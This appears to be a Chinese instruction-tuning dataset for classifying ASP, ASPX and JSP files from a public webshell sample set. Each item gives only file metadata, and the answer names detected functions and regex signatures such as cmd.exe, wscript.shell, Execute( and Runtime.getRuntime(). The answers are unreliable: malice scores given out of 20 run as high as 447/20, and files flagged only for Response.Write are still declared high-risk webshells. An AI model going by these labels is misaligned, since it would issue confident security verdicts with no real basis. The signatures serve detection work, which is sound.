{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"4206124de2be576d806538439bb17320.asp\", \"文件类型\": \"asp\", \"文件大小\": \"98078 bytes\", \"行数\": 3817}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, request.queryString, execute(, CreateObject(, request.Form 发现混淆技术: chr\\s*\\( 恶意度评分: 86/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/xiaoma/4206124de2be576d806538439bb17320.asp", "malicious_score": 86, "md5_hash": "5058bb202af3295ac4cf3ae85b0d94af"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hkmjj.asp\", \"文件类型\": \"asp\", \"文件大小\": \"653 bytes\", \"行数\": 22}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.write, execute ( 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/xiaoma/hkmjj.asp", "malicious_score": 8, "md5_hash": "8fadd9f56866840fb750d1e9acb5ee14"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdasp.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"1400 bytes\", \"行数\": 42}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/cmdasp.aspx", "malicious_score": 12, "md5_hash": "5e83b6ed422399de04408b80f3e5470e"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c70e2ec7d56ba0e2f40d1f4ebc6913d1.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"109750 bytes\", \"行数\": 2964}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/c70e2ec7d56ba0e2f40d1f4ebc6913d1.aspx", "malicious_score": 54, "md5_hash": "45d854e66631e5c1cda6dbf4fea074ce"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"871ab8ff4257c4cf7af487a5f3597647.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"31665 bytes\", \"行数\": 1012}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, cmd.Exe, Response.Write, cmd.exe 具备文件操作能力: copy\\s*\\( 恶意度评分: 283/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/871ab8ff4257c4cf7af487a5f3597647.aspx", "malicious_score": 283, "md5_hash": "6d45df998ab3fcb02956ad4c554037a9"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b398c05cbac28da9b9cd6819325f0eb3.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"20399 bytes\", \"行数\": 707}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.Form 具备文件操作能力: copy\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/b398c05cbac28da9b9cd6819325f0eb3.aspx", "malicious_score": 10, "md5_hash": "6fbfc835c1f5caf2959d11f78a36dd62"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"65042 bytes\", \"行数\": 1244}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form 发现混淆技术: base64_decode, chr\\s*\\( 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 155/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/devilzShell.aspx", "malicious_score": 155, "md5_hash": "7981f1bf9b8e5f4691e4ac440f1ba251"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"clean.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"46343 bytes\", \"行数\": 1047}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, Execute(, response.Write, CreateObject(, createObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 63/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/clean.aspx", "malicious_score": 63, "md5_hash": "352a8a9c10c8551855412c07eca9798c"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspx.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70380 bytes\", \"行数\": 2588}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/aspx.aspx", "malicious_score": 36, "md5_hash": "60881e9daefa09fe1fd75b5e0fb01f3e"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"11.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"62590 bytes\", \"行数\": 1561}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/11.aspx", "malicious_score": 27, "md5_hash": "e5027309bf8343934d3dfd24250f91a0"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"767adb7c46b36e69f6a15b637eadfb4b.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70232 bytes\", \"行数\": 2579}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/767adb7c46b36e69f6a15b637eadfb4b.aspx", "malicious_score": 36, "md5_hash": "a044b2459dab4e7240cb7703c98c6d91"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2c92ca14b24fd3291bf419e52c976b0d.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70372 bytes\", \"行数\": 2587}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/2c92ca14b24fd3291bf419e52c976b0d.aspx", "malicious_score": 36, "md5_hash": "07191f554ed5d9025bc85ee1bf51f975"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASPNETBackDoor.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"117982 bytes\", \"行数\": 2949}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, wscript.shell, Request.QueryString, Response.Write, cmd.exe 恶意度评分: 447/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/ASPNETBackDoor.aspx", "malicious_score": 447, "md5_hash": "5bb7e754c721ccf68e7d06f83358ed66"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspxclassic.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"62083 bytes\", \"行数\": 1553}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/aspxclassic.aspx", "malicious_score": 27, "md5_hash": "beb9de6631505089629a9fc7845f754f"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdexec.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"2919 bytes\", \"行数\": 96}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/cmdexec.aspx", "malicious_score": 18, "md5_hash": "67af0bc97b3ea18025a88a0b0201c18d"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"72222b66cf4c62b59e1aa5f9f6595ef1.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61207 bytes\", \"行数\": 1689}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, Response.write, CreateObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 426/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/72222b66cf4c62b59e1aa5f9f6595ef1.aspx", "malicious_score": 426, "md5_hash": "d546b2c2b98d96c464652291a855b250"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"6173e106b929b82f8f23ee0714bf77e6.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"612 bytes\", \"行数\": 19}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/6173e106b929b82f8f23ee0714bf77e6.aspx", "malicious_score": 6, "md5_hash": "19b41251a51e7685b983e272b96455f8"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wt.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"6730 bytes\", \"行数\": 146}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/wt.aspx", "malicious_score": 12, "md5_hash": "5e4cbd80ebeac95b36585789b7056d30"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"view.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"59534 bytes\", \"行数\": 1685}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, Response.write, CreateObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 426/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/view.aspx", "malicious_score": 426, "md5_hash": "1807b32abb9a7b604e366d7c8f2db1b2"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sql.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"3303 bytes\", \"行数\": 104}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/sql.aspx", "malicious_score": 6, "md5_hash": "3125bf04153259891bf64e9ceaa95769"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fileupload.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"3932 bytes\", \"行数\": 126}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/fileupload.aspx", "malicious_score": 54, "md5_hash": "f6591c1ab7f7b782c386af1b6c2c0e9b"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspxspy.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61913 bytes\", \"行数\": 1563}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/aspxspy.aspx", "malicious_score": 27, "md5_hash": "ba55e0634db31bfe37d979269deefac0"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sniffer.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"20304 bytes\", \"行数\": 707}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.Form 具备文件操作能力: copy\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/sniffer.aspx", "malicious_score": 10, "md5_hash": "f3c46a414567251fd5bc59e1f1ead300"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5ac204267e0cb32f29b46a3b07de8d9b.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"50481 bytes\", \"行数\": 1596}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/5ac204267e0cb32f29b46a3b07de8d9b.aspx", "malicious_score": 27, "md5_hash": "4b646e7958e1bb00924b8e6598fe6670"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devshell.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"65042 bytes\", \"行数\": 1244}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form 发现混淆技术: base64_decode, chr\\s*\\( 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 155/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/devshell.aspx", "malicious_score": 155, "md5_hash": "7981f1bf9b8e5f4691e4ac440f1ba251"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Aspxmiansha.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"117818 bytes\", \"行数\": 2941}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, wscript.shell, Request.QueryString, Response.Write, cmd.exe 恶意度评分: 447/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/Aspxmiansha.aspx", "malicious_score": 447, "md5_hash": "3b68b1039e419a3e0953bd3d739bf8d2"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2596d7fad05e48cf35f4420caac86015.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"27229 bytes\", \"行数\": 900}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, cmd.Exe, Response.Write, cmd.exe 具备文件操作能力: copy\\s*\\( 恶意度评分: 277/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/2596d7fad05e48cf35f4420caac86015.aspx", "malicious_score": 277, "md5_hash": "378aa33219c69b43a7d674368ba7ae36"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"36700f784aa177420263e000226e911c.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70053 bytes\", \"行数\": 2578}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/36700f784aa177420263e000226e911c.aspx", "malicious_score": 36, "md5_hash": "4473fd5a51392dcd67bc35e4b8d8a612"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspxspy1.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61913 bytes\", \"行数\": 1563}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/aspxspy1.aspx", "malicious_score": 27, "md5_hash": "ba55e0634db31bfe37d979269deefac0"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ee39e52559fe0ea597d391ea247de836.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70029 bytes\", \"行数\": 2581}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/ee39e52559fe0ea597d391ea247de836.aspx", "malicious_score": 36, "md5_hash": "853d91aa5a833db0c24837477b0a1ad0"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1env.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"62590 bytes\", \"行数\": 1561}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/1env.aspx", "malicious_score": 27, "md5_hash": "e5027309bf8343934d3dfd24250f91a0"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"01.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"117818 bytes\", \"行数\": 2941}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, wscript.shell, Request.QueryString, Response.Write, cmd.exe 恶意度评分: 447/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/01.aspx", "malicious_score": 447, "md5_hash": "3b68b1039e419a3e0953bd3d739bf8d2"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61207 bytes\", \"行数\": 1689}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, Response.write, CreateObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 426/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/dama/wso.aspx", "malicious_score": 426, "md5_hash": "d546b2c2b98d96c464652291a855b250"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"filesystembrowser.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"6945 bytes\", \"行数\": 207}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/xiaoma/filesystembrowser.aspx", "malicious_score": 48, "md5_hash": "fa0366e2cf46df761be83685b39f59b9"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5009 bytes\", \"行数\": 108}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/xiaoma/1.aspx", "malicious_score": 6, "md5_hash": "f4b6773c752b5d53c4898cab21a4fdc8"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"finaly.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5009 bytes\", \"行数\": 108}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/xiaoma/finaly.aspx", "malicious_score": 6, "md5_hash": "f4b6773c752b5d53c4898cab21a4fdc8"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"registerad.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5009 bytes\", \"行数\": 108}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASPX/xiaoma/registerad.aspx", "malicious_score": 6, "md5_hash": "f4b6773c752b5d53c4898cab21a4fdc8"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy2009.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85022 bytes\", \"行数\": 2339}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/JspSpy2009.jsp", "malicious_score": 324, "md5_hash": "3654f747b7785472ec96de35a374819c"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"download.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"72359 bytes\", \"行数\": 1913}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/download.jsp", "malicious_score": 184, "md5_hash": "fa87bbd7201021c1aefee6fcc5b8e25a"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma4.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"56060 bytes\", \"行数\": 1780}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/ma4.jsp", "malicious_score": 175, "md5_hash": "eebc60a70e1823f2aa519a57fb8992c7"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"no.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30189 bytes\", \"行数\": 995}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/no.jsp", "malicious_score": 37, "md5_hash": "08f3b1efbec31fcc861efac30aaafaff"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspypingmu.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84420 bytes\", \"行数\": 2326}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/jspspypingmu.jsp", "malicious_score": 315, "md5_hash": "72a2f60fe0dee245ee36d8f5571aed00"}}
